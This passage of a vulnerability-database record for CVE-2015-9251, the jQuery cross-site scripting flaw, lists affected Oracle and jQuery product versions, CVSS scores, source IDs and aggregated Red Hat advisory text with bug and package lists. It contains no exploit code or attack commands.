vendor: "oracle", version: "8.55", }, { model: "oss support tools", scope: "eq", trust: 1.3, vendor: "oracle", version: "19.1", }, { model: "jdeveloper", scope: "eq", trust: 1.3, vendor: "oracle", version: "12.2.1.3.0", }, { model: "jdeveloper", scope: "eq", trust: 1.3, vendor: "oracle", version: "12.1.3.0.0", }, { model: "jdeveloper", scope: "eq", trust: 1.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "jd edwards enterpriseone tools", scope: "eq", trust: 1.3, vendor: "oracle", version: "9.2", }, { model: "insurance insbridge rating and underwriting", scope: "eq", trust: 1.3, vendor: "oracle", version: "5.5", }, { model: "insurance insbridge rating and underwriting", scope: "eq", trust: 1.3, vendor: "oracle", version: "5.4", }, { model: "insurance insbridge rating and underwriting", scope: "eq", trust: 1.3, vendor: "oracle", version: "5.2", }, { model: "hospitality materials control", scope: "eq", trust: 1.3, vendor: "oracle", version: "18.1", }, { model: "hospitality guest access", scope: "eq", trust: 1.3, vendor: "oracle", version: "4.2.1", }, { model: "healthcare foundation", scope: "eq", trust: 1.3, vendor: "oracle", version: "7.2", }, { model: "healthcare foundation", scope: "eq", trust: 1.3, vendor: "oracle", version: "7.1", }, { model: "fusion middleware mapviewer", scope: "eq", trust: 1.3, vendor: "oracle", version: "12.2.1.3.0", }, { model: "financial services reconciliation framework", scope: "eq", trust: 1.3, vendor: "oracle", version: "8.0.6", }, { model: "financial services reconciliation framework", scope: "eq", trust: 1.3, vendor: "oracle", version: "8.0.5", }, { model: "financial services market risk measurement and management", scope: "eq", trust: 1.3, vendor: "oracle", version: "8.0.6", }, { model: "financial services market risk measurement and management", scope: "eq", trust: 1.3, vendor: "oracle", version: "8.0.5", }, { model: "enterprise operations monitor", scope: "eq", trust: 1.3, vendor: "oracle", version: "4.0", }, { model: "enterprise operations monitor", scope: "eq", trust: 1.3, vendor: "oracle", version: "3.4", }, { model: "enterprise manager ops center", scope: "eq", trust: 1.3, vendor: "oracle", version: "12.3.3", }, { model: "enterprise manager ops center", scope: "eq", trust: 1.3, vendor: "oracle", version: "12.2.2", }, { model: "communications interactive session recorder", scope: "eq", trust: 1.3, vendor: "oracle", version: "6.2", }, { model: "communications interactive session recorder", scope: "eq", trust: 1.3, vendor: "oracle", version: "6.1", }, { model: "communications interactive session recorder", scope: "eq", trust: 1.3, vendor: "oracle", version: "6.0", }, { model: "business process management suite", scope: "eq", trust: 1.3, vendor: "oracle", version: "12.2.1.3.0", }, { model: "business process management suite", scope: "eq", trust: 1.3, vendor: "oracle", version: "12.1.3.0.0", }, { model: "business process management suite", scope: "eq", trust: 1.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "banking platform", scope: "eq", trust: 1.3, vendor: "oracle", version: "2.6.2", }, { model: "banking platform", scope: "eq", trust: 1.3, vendor: "oracle", version: "2.6.1", }, { model: "agile product lifecycle management for process", scope: "eq", trust: 1.3, vendor: "oracle", version: "6.2.3.1", }, { model: "agile product lifecycle management for process", scope: "eq", trust: 1.3, vendor: "oracle", version: "6.2.3.0", }, { model: "agile product lifecycle management for process", scope: "eq", trust: 1.3, vendor: "oracle", version: "6.2.2.0", }, { model: "agile product lifecycle management for process", scope: "eq", trust: 1.3, vendor: "oracle", version: "6.2.1.0", }, { model: "agile product lifecycle management for process", scope: "eq", trust: 1.3, vendor: "oracle", version: "6.2.0.0", }, { model: "endeca information discovery studio", scope: "eq", trust: 1, vendor: "oracle", version: "3.2.0", }, { model: "financial services loan loss forecasting and provisioning", scope: "lte", trust: 1, vendor: "oracle", version: "8.0.7", }, { model: "hospitality cruise fleet management", scope: "eq", trust: 1, vendor: "oracle", version: "9.0.11", }, { model: "financial services asset liability management", scope: "lte", trust: 1, vendor: "oracle", version: "8.0.7", }, { model: "financial services profitability management", scope: "lte", trust: 1, vendor: "oracle", version: "8.0.6", }, { model: "financial services profitability management", scope: "gte", trust: 1, vendor: "oracle", version: "8.0.4", }, { model: "financial services analytical applications infrastructure", scope: "lte", trust: 1, vendor: "oracle", version: "7.3.5", }, { model: "utilities framework", scope: "lte", trust: 1, vendor: "oracle", version: "4.3.0.4", }, { model: "financial services asset liability management", scope: "gte", trust: 1, vendor: "oracle", version: "8.0.4", }, { model: "banking platform", scope: "eq", trust: 1, vendor: "oracle", version: "2.6.0", }, { model: "financial services data integration hub", scope: "lte", trust: 1, vendor: "oracle", version: "8.0.7", }, { model: "healthcare translational research", scope: "eq", trust: 1, vendor: "oracle", version: "3.1.0", }, { model: "hospitality guest access", scope: "eq", trust: 1, vendor: "oracle", version: "4.2.0", }, { model: "communications converged application server", scope: "lt", trust: 1, vendor: "oracle", version: "7.0.0.1", }, { model: "endeca information discovery studio", scope: "eq", trust: 1, vendor: "oracle", version: "3.1.0", }, { model: "siebel ui framework", scope: "eq", trust: 1, vendor: "oracle", version: "18.10", }, { model: "utilities framework", scope: "gte", trust: 1, vendor: "oracle", version: "4.3.0.1", }, { model: "financial services funds transfer pricing", scope: "lte", trust: 1, vendor: "oracle", version: "8.0.7", }, { model: "hospitality reporting and analytics", scope: "eq", trust: 1, vendor: "oracle", version: "9.1.0", }, { model: "primavera unifier", scope: "gte", trust: 1, vendor: "oracle", version: "17.1", }, { model: "primavera unifier", scope: "lte", trust: 1, vendor: "oracle", version: "17.12", }, { model: "jquery", scope: "lt", trust: 1, vendor: "jquery", version: "3.0.0", }, { model: "utilities mobile workforce management", scope: "eq", trust: 1, vendor: "oracle", version: "2.3.0", }, { model: "financial services loan loss forecasting and provisioning", scope: "gte", trust: 1, vendor: "oracle", version: "8.0.2", }, { model: "communications webrtc session controller", scope: "lt", trust: 1, vendor: "oracle", version: "7.2", }, { model: "financial services hedge management and ifrs valuations", scope: "lte", trust: 1, vendor: "oracle", version: "8.0.7", }, { model: "webcenter sites", scope: "eq", trust: 1, vendor: "oracle", version: "11.1.1.8.0", }, { model: "retail workforce management software", scope: "eq", trust: 1, vendor: "oracle", version: "1.64.0", }, { model: "financial services data integration hub", scope: "gte", trust: 1, vendor: "oracle", version: "8.0.5", }, { model: "financial services analytical applications infrastructure", scope: "lte", trust: 1, vendor: "oracle", version: "8.0.7", }, { model: "financial services funds transfer pricing", scope: "gte", trust: 1, vendor: "oracle", version: "8.0.4", }, { model: "financial services liquidity risk management", scope: "gte", trust: 1, vendor: "oracle", version: "8.0.2", }, { model: "siebel ui framework", scope: "eq", trust: 1, vendor: "oracle", version: "18.11", }, { model: "financial services analytical applications infrastructure", scope: "gte", trust: 1, vendor: "oracle", version: "7.3.3", }, { model: "financial services liquidity risk management", scope: "lte", trust: 1, vendor: "oracle", version: "8.0.6", }, { model: "financial services hedge management and ifrs valuations", scope: "gte", trust: 1, vendor: "oracle", version: "8.0.4", }, { model: "communications services gatekeeper", scope: "lt", trust: 1, vendor: "oracle", version: "6.1.0.4.0", }, { model: "financial services analytical applications infrastructure", scope: "gte", trust: 1, vendor: "oracle", version: "8.0.0", }, { model: "real-time scheduler", scope: "eq", trust: 1, vendor: "oracle", version: "2.3.0", }, { model: "jquery", scope: "eq", trust: 0.9, vendor: "jquery", version: "1.6.3", }, { model: "jquery", scope: "eq", trust: 0.9, vendor: "jquery", version: "1.6.2", }, { model: "jquery", scope: "eq", trust: 0.9, vendor: "jquery", version: "1.6.1", }, { model: "jquery", scope: "eq", trust: 0.9, vendor: "jquery", version: "1.4.2", }, { model: "jquery", scope: "eq", trust: 0.9, vendor: "jquery", version: "1.8.1", }, { model: "jquery", scope: "eq", trust: 0.9, vendor: "jquery", version: "1.8.0", }, { model: "jquery", scope: "eq", trust: 0.9, vendor: "jquery", version: "1.7.2", }, { model: "jquery", scope: "eq", trust: 0.9, vendor: "jquery", version: "1.7.1", }, { model: "jquery", scope: "eq", trust: 0.9, vendor: "jquery", version: "1.6.4", }, { model: "jquery", scope: "eq", trust: 0.9, vendor: "jquery", version: "1.6", }, { model: "jquery", scope: "eq", trust: 0.8, vendor: "jquery", version: "3.0.0", }, { model: "jquery", scope: "eq", trust: 0.8, vendor: "jquery", version: null, }, { model: "webcenter sites", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.18.0", }, { model: "utilities mobile workforce management", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.3", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.4", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.3.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.1", }, { model: "retail workforce management software", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.64", }, { model: "real-time scheduler", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.3.0.0", }, { model: "primavera unifier", scope: "eq", trust: 0.3, vendor: "oracle", version: "17.7", }, { model: "primavera unifier", scope: "eq", trust: 0.3, vendor: "oracle", version: "17.12", }, { model: "hospitality reporting and analytics", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.1", }, { model: "hospitality guest access", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2", }, { model: "healthcare translational research", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1", }, { model: "financial services profitability management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0.6", }, { model: "financial services profitability management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0.5", }, { model: "financial services profitability management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0.4", }, { model: "financial services loan loss forecasting and provisioning", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0.7", }, { model: "financial services loan loss forecasting and provisioning", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0.5", }, { model: "financial services loan loss forecasting and provisioning", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0.4", }, { model: "financial services loan loss forecasting and provisioning", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0.3", }, { model: "financial services loan loss forecasting and provisioning", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0.2", }, { model: "financial services liquidity risk management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0.6", }, { model: "financial services liquidity risk management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0.4", }, { model: "financial services liquidity risk management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0.2", }, { model: "financial services hedge management and ifrs valuations", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0.7", }, { model: "financial services hedge management and ifrs valuations", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0.5", }, { model: "financial services hedge management and ifrs valuations", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0.4", }, { model: "financial services funds transfer pricing", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0.7", }, { model: "financial services funds transfer pricing", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0.5", }, { model: "financial services funds transfer pricing", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0.4", }, { model: "financial services data integration hub", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0.7", }, { model: "financial services data integration hub", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0.5", }, { model: "financial services asset liability management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0.7", }, { model: "financial services asset liability management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0.5", }, { model: "financial services asset liability management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0.4", }, { model: "financial services analytical applications infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0.7", }, { model: "financial services analytical applications infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0.6", }, { model: "financial services analytical applications infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0.5", }, { model: "financial services analytical applications infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0.4", }, { model: "financial services analytical applications infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0.3", }, { model: "financial services analytical applications infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0.2", }, { model: "financial services analytical applications infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0.1", }, { model: "financial services analytical applications infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0", }, { model: "financial services analytical applications infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.5", }, { model: "financial services analytical applications infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.4", }, { model: "financial services analytical applications infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.3", }, { model: "endeca information discovery studio", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2", }, { model: "endeca information discovery studio", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1", }, { model: "diagnostic assistant", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.12", }, { model: "communications webrtc session controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.1", }, { model: "communications webrtc session controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "communications converged application server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "communications application session controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.8", }, { model: "communications application session controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.7.1", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.4.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.6", }, { model: "jquery", scope: "eq", trust: 0.3, vendor: "jquery", version: "1.9", }, { model: "jquery", scope: "eq", trust: 0.3, vendor: "jquery", version: "1.2.6", }, { model: "jquery", scope: "eq", trust: 0.3, vendor: "jquery", version: "2.2", }, { model: "jquery", scope: "eq", trust: 0.3, vendor: "jquery", version: "2.1", }, { model: "intouch access anywhere update", scope: "eq", trust: 0.3, vendor: "aveva", version: "20172", }, { model: "intouch access anywhere", scope: "eq", trust: 0.3, vendor: "aveva", version: "2017", }, { model: "diagnostic assistant", scope: "ne", trust: 0.3, vendor: "oracle", version: "2.12.36", }, { model: "communications webrtc session controller", scope: "ne", trust: 0.3, vendor: "oracle", version: "7.2", }, { model: "communications converged application server", scope: "ne", trust: 0.3, vendor: "oracle", version: "7.0.0.1", }, { model: "jquery", scope: "ne", trust: 0.3, vendor: "jquery", version: "3.0", }, { model: "intouch access anywhere update 2b", scope: "ne", trust: 0.3, vendor: "aveva", version: "2017", }, ], sources: [ { db: "BID", id: "105658", }, { db: "JVNDB", id: "JVNDB-2015-008097", }, { db: "CNNVD", id: "CNNVD-201801-798", }, { db: "NVD", id: "CVE-2015-9251", }, ], }, credits: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "John Martinelli,Red Hat,Oleg Gaidarenko,SECURELI.com", sources: [ { db: "CNNVD", id: "CNNVD-201801-798", }, ], trust: 0.6, }, cve: "CVE-2015-9251", cvss: { "@context": { cvssV2: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2", }, cvssV3: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/", }, severity: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#", }, "@id": "https://www.variotdbs.pl/ref/cvss/severity", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { cvssV2: [ { accessComplexity: "MEDIUM", accessVector: "NETWORK", authentication: "NONE", author: "nvd@nist.gov", availabilityImpact: "NONE", baseScore: 4.3, confidentialityImpact: "NONE", exploitabilityScore: 8.6, id: "CVE-2015-9251", impactScore: 2.9, integrityImpact: "PARTIAL", severity: "MEDIUM", trust: 1.8, vectorString: "AV:N/AC:M/Au:N/C:N/I:P/A:N", version: "2.0", }, { accessComplexity: "MEDIUM", accessVector: "NETWORK", authentication: "NONE", author: "VULHUB", availabilityImpact: "NONE", baseScore: 4.3, confidentialityImpact: "NONE", exploitabilityScore: 8.6, id: "VHN-87212", impactScore: 2.9, integrityImpact: "PARTIAL", severity: "MEDIUM", trust: 0.1, vectorString: "AV:N/AC:M/AU:N/C:N/I:P/A:N", version: "2.0", }, ], cvssV3: [ { attackComplexity: "LOW", attackVector: "NETWORK", author: "nvd@nist.gov", availabilityImpact: "NONE", baseScore: 6.1, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", exploitabilityScore: 2.8, id: "CVE-2015-9251", impactScore: 2.7, integrityImpact: "LOW", privilegesRequired: "NONE", scope: "CHANGED", trust: 1.8, userInteraction: "REQUIRED", vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", version: "3.0", }, ], severity: [ { author: "nvd@nist.gov", id: "CVE-2015-9251", trust: 1, value: "MEDIUM", }, { author: "NVD", id: "CVE-2015-9251", trust: 0.8, value: "Medium", }, { author: "CNNVD", id: "CNNVD-201801-798", trust: 0.6, value: "MEDIUM", }, { author: "VULHUB", id: "VHN-87212", trust: 0.1, value: "MEDIUM", }, ], }, ], sources: [ { db: "VULHUB", id: "VHN-87212", }, { db: "JVNDB", id: "JVNDB-2015-008097", }, { db: "CNNVD", id: "CNNVD-201801-798", }, { db: "NVD", id: "CVE-2015-9251", }, ], }, description: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "jQuery before 3.0.0 is vulnerable to Cross-site Scripting (XSS) attacks when a cross-domain Ajax request is performed without the dataType option, causing text/javascript responses to be executed. jQuery Contains a cross-site scripting vulnerability.Information may be obtained and information may be tampered with. JQuery is prone to a cross-site-scripting vulnerability because it fails to sufficiently sanitize user-supplied input. \nAn attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. \nVersions prior to JQuery 3.0.0 are vulnerable. jQuery is an open source, cross-browser JavaScript library developed by American John Resig programmers. The library simplifies the operation between HTML and JavaScript, and has the characteristics of modularization and plug-in extension. The vulnerability stems from the lack of correct validation of client data in WEB applications. An attacker could exploit this vulnerability to execute client code. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. JIRA issues fixed (https://issues.jboss.org/):\n\nJBEAP-23864 - (7.4.z) Upgrade xmlsec from 2.1.7.redhat-00001 to 2.2.3.redhat-00001\nJBEAP-23865 - [GSS](7.4.z) Upgrade Apache CXF from 3.3.13.redhat-00001 to 3.4.10.redhat-00001\nJBEAP-23866 - (7.4.z) Upgrade wss4j from 2.2.7.redhat-00001 to 2.3.3.redhat-00001\nJBEAP-23928 - Tracker bug for the EAP 7.4.9 release for RHEL-9\nJBEAP-24055 - (7.4.z) Upgrade HAL from 3.3.15.Final-redhat-00001 to 3.3.16.Final-redhat-00001\nJBEAP-24081 - (7.4.z) Upgrade Elytron from 1.15.14.Final-redhat-00001 to 1.15.15.Final-redhat-00001\nJBEAP-24095 - (7.4.z) Upgrade elytron-web from 1.9.2.Final-redhat-00001 to 1.9.3.Final-redhat-00001\nJBEAP-24100 - [GSS](7.4.z) Upgrade Undertow from 2.2.20.SP1-redhat-00001 to 2.2.22.SP3-redhat-00001\nJBEAP-24127 - (7.4.z) UNDERTOW-2123 - Update AsyncContextImpl.dispatch to use proper value\nJBEAP-24128 - (7.4.z) Upgrade Hibernate Search from 5.10.7.Final-redhat-00001 to 5.10.13.Final-redhat-00001\nJBEAP-24132 - [GSS](7.4.z) Upgrade Ironjacamar from 1.5.3.SP2-redhat-00001 to 1.5.10.Final-redhat-00001\nJBEAP-24147 - (7.4.z) Upgrade jboss-ejb-client from 4.0.45.Final-redhat-00001 to 4.0.49.Final-redhat-00001\nJBEAP-24167 - (7.4.z) Upgrade WildFly Core from 15.0.19.Final-redhat-00001 to 15.0.21.Final-redhat-00002\nJBEAP-24191 - [GSS](7.4.z) Upgrade remoting from 5.0.26.SP1-redhat-00001 to 5.0.27.Final-redhat-00001\nJBEAP-24195 - [GSS](7.4.z) Upgrade JSF API from 3.0.0.SP06-redhat-00001 to 3.0.0.SP07-redhat-00001\nJBEAP-24207 - (7.4.z) Upgrade Soteria from 1.0.1.redhat-00002 to 1.0.1.redhat-00003\nJBEAP-24248 - (7.4.z) ELY-2492 - Upgrade sshd-common in Elytron from 2.7.0 to 2.9.2\nJBEAP-24426 - (7.4.z) Upgrade Elytron from 1.15.15.Final-redhat-00001 to 1.15.16.Final-redhat-00001\nJBEAP-24427 - (7.4.z) Upgrade WildFly Core from 15.0.21.Final-redhat-00002 to 15.0.22.Final-redhat-00001\n\n7. Description:\n\nRed Hat Fuse provides a small-footprint, flexible, open source enterprise\nservice bus and integration platform. Red Hat A-MQ is a standards compliant\nmessaging system that is tailored for use in mission critical applications. It\nincludes bug fixes, which are documented in the patch notes accompanying\nthe package on the download page. See the download link given in the\nreferences section below. Solution:\n\nBefore applying the update, back up your existing installation, including\nall applications, configuration files, databases and database settings, and\nso on. \n\nInstallation instructions are located in the download section of the\ncustomer portal. \n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Moderate: idm:DL1 and idm:client security, bug fix, and enhancement update\nAdvisory ID: RHSA-2020:4670-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2020:4670\nIssue date: 2020-11-03\nCVE Names: CVE-2015-9251 CVE-2016-10735 CVE-2018-14040\n CVE-2018-14042 CVE-2018-20676 CVE-2018-20677\n CVE-2019-8331 CVE-2019-11358 CVE-2020-1722\n CVE-2020-11022\n====================================================================\n1. Summary:\n\nAn update for the idm:DL1 and idm:client modules is now available for Red\nHat Enterprise Linux 8. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux AppStream (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64\n\n3. Description:\n\nRed Hat Identity Management (IdM) is a centralized authentication, identity\nmanagement, and authorization solution for both traditional and cloud-based\nenterprise environments. \n\nThe following packages have been upgraded to a later upstream version: ipa\n(4.8.7), softhsm (2.6.0), opendnssec (2.1.6). (BZ#1759888, BZ#1818765,\nBZ#1818877)\n\nSecurity Fix(es):\n\n* js-jquery: Cross-site scripting via cross-domain ajax requests\n(CVE-2015-9251)\n\n* bootstrap: XSS in the data-target attribute (CVE-2016-10735)\n\n* bootstrap: Cross-site Scripting (XSS) in the collapse data-parent\nattribute (CVE-2018-14040)\n\n* bootstrap: Cross-site Scripting (XSS) in the data-container property of\ntooltip (CVE-2018-14042)\n\n* bootstrap: XSS in the tooltip data-viewport attribute (CVE-2018-20676)\n\n* bootstrap: XSS in the affix configuration target property\n(CVE-2018-20677)\n\n* bootstrap: XSS in the tooltip or popover data-template attribute\n(CVE-2019-8331)\n\n* js-jquery: Prototype pollution in object's prototype leading to denial of\nservice, remote code execution, or property injection (CVE-2019-11358)\n\n* jquery: Cross-site scripting due to improper injQuery.htmlPrefilter\nmethod (CVE-2020-11022)\n\n* ipa: No password length restriction leads to denial of service\n(CVE-2020-1722)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 8.3 Release Notes linked from the References section. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1399546 - CVE-2015-9251 jquery: Cross-site scripting via cross-domain ajax requests\n1430365 - [RFE] Host-group names command rename\n1488732 - fake_mname in named.conf is no longer effective\n1585020 - Enable compat tree to provide information about AD users and groups on trust agents\n1601614 - CVE-2018-14040 bootstrap: Cross-site Scripting (XSS) in the collapse data-parent attribute\n1601617 - CVE-2018-14042 bootstrap: Cross-site Scripting (XSS) in the data-container property of tooltip\n1651577 - [WebUI] IPA Error 3007: RequirmentError\" while adding members in \"User ID overrides\" tab\n1668082 - CVE-2018-20676 bootstrap: XSS in the tooltip data-viewport attribute\n1668089 - CVE-2018-20677 bootstrap: XSS in the affix configuration target property\n1668097 - CVE-2016-10735 bootstrap: XSS in the data-target attribute\n1686454 - CVE-2019-8331 bootstrap: XSS in the tooltip or popover data-template attribute\n1701233 - [RFE] support setting supported signature methods on the token\n1701972 - CVE-2019-11358 jquery: Prototype pollution in object's prototype leading to denial of service, remote code execution, or property injection\n1746830 - Memory leak during search of idview overrides\n1750893 - Memory leak when slapi-nis return entries retrieved from nsswitch\n1751295 - When sync-repl is enabled, slapi-nis can deadlock during retrochanglog trimming\n1757045 - IDM Web GUI / IPA web UI: the ID override operation doesn't work in GUI (it works only from CLI)\n1759888 - Rebase OpenDNSSEC to 2.1\n1768156 - ERR - schemacompat - map rdlock: old way MAP_MONITOR_DISABLED\n1777806 - When Service weight is set as 0 for server in IPA location \"IPA Error 903: InternalError\" is displayed\n1793071 - CVE-2020-1722 ipa: No password length restriction leads to denial of service\n1801698 - [RFE] Changing default hostgroup is too easy\n1802471 - SELinux policy for ipa-custodia\n1809835 - RFE: ipa group-add-member: number of failed should also be emphasized\n1810154 - RFE: ipa-backup should compare locally and globally installed server roles\n1810179 - ipa-client-install should name authselect backups and restore to that at uninstall time\n1813330 - ipa-restore does not restart httpd\n1816784 - KRA install fails if all KRA members are Hidden Replicas\n1818765 - [Rebase] Rebase ipa to 4.8.6+\n1818877 - [Rebase] Rebase to softhsm 2.6.0+\n1828406 - CVE-2020-11022 jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method\n1831732 - AVC avc: denied { dac_override } for comm=\"ods-enforcerd\n1831935 - AD authentication with IdM against SQL Server\n1832331 - [abrt] [faf] 389-ds-base: unknown function(): /usr/sbin/ns-slapd killed by 11\n1833266 - [dirsrv] set 'nsslapd-enable-upgrade-hash: off' as this raises warnings\n1834264 - BIND rebase: rebuild against new so version\n1834909 - softhsm use-after-free on process exit\n1845211 - Rebase bind-dyndb-ldap to 11.3\n1845537 - IPA bind configuration issue\n1845596 - ipa trust-add fails with 'Fetching domains from trusted forest failed'\n1846352 - cannot issue certs with multiple IP addresses corresponding to different hosts\n1846434 - Remove ipa-idoverride-memberof as superceded by ipa-server 4.8.7\n1847999 - EPN does not ship its default configuration ( /etc/ipa/epn.conf ) in freeipa-client-epn\n1849914 - FreeIPA - Utilize 256-bit AJP connector passwords\n1851411 - ipa: typo issue in ipanthomedirectoryrive deffinition\n1852244 - ipa-healthcheck inadvertently obsoleted in RHEL 8.2\n1853263 - ipa-selinux package missing\n1857157 - replica install failing with avc denial for custodia component\n1858318 - AttributeError: module 'ssl' has no attribute 'SSLCertVerificationError' when upgrading ca-less ipa master\n1859213 - AVC denial during ipa-adtrust-install --add-agents\n1863079 - ipa-epn command displays 'exception: ConnectionRefusedError: [Errno 111] Connection refused'\n1863616 - CA-less install does not set required permissions on KDC certificate\n1866291 - EPN: enhance input validation\n1866938 - ipa-epn fails to retrieve user data if some user attributes are not present\n1868432 - Unhandled Python exception in '/usr/libexec/ipa/ipa-pki-retrieve-key'\n1869311 - ipa trust-add fails with 'Fetching domains from trusted forest failed'\n1870202 - File permissions of /etc/ipa/ca.crt differ between CA-ful and CA-less\n1874015 - ipa hbacrule-add-service --hbacsvcs=sshd is not applied successfully for subdomain\n1875348 - Valgrind reports a memory leak in the Schema Compatibility plugin. \n1879604 - pkispawn logs files are empty\n\n6. Package List:\n\nRed Hat Enterprise Linux AppStream (v. 8):\n\nSource:\nbind-dyndb-ldap-11.3-1.module+el8.3.0+6993+104f8db0.src.rpm\ncustodia-0.6.0-3.module+el8.1.0+4098+f286395e.src.rpm\nipa-4.8.7-12.module+el8.3.0+8222+c1bff54a.src.rpm\nipa-4.8.7-12.module+el8.3.0+8223+6212645f.src.rpm\nipa-healthcheck-0.4-6.module+el8.3.0+7710+e2408ce4.src.rpm\nipa-healthcheck-0.4-6.module+el8.3.0+7711+c4441980.src.rpm\nopendnssec-2.1.6-2.module+el8.3.0+6580+328a3362.src.rpm\npython-jwcrypto-0.5.0-1.module+el8.1.0+4098+f286395e.src.rpm\npython-jwcrypto-0.5.0-1.module+el8.1.0+4107+4a66eb87.src.rpm\npython-kdcproxy-0.4-5.module+el8.2.0+4691+a05b2456.src.rpm\npython-qrcode-5.1-12.module+el8.1.0+4098+f286395e.src.rpm\npython-qrcode-5.1-12.module+el8.1.0+4107+4a66eb87.src.rpm\npython-yubico-1.3.2-9.module+el8.1.0+4098+f286395e.src.rpm\npython-yubico-1.3.2-9.module+el8.1.0+4107+4a66eb87.src.rpm\npyusb-1.0.0-9.module+el8.1.0+4098+f286395e.src.rpm\npyusb-1.0.0-9.module+el8.1.0+4107+4a66eb87.src.rpm\nslapi-nis-0.56.5-4.module+el8.3.0+8222+c1bff54a.src.rpm\nsofthsm-2.6.0-3.module+el8.3.0+6909+fb337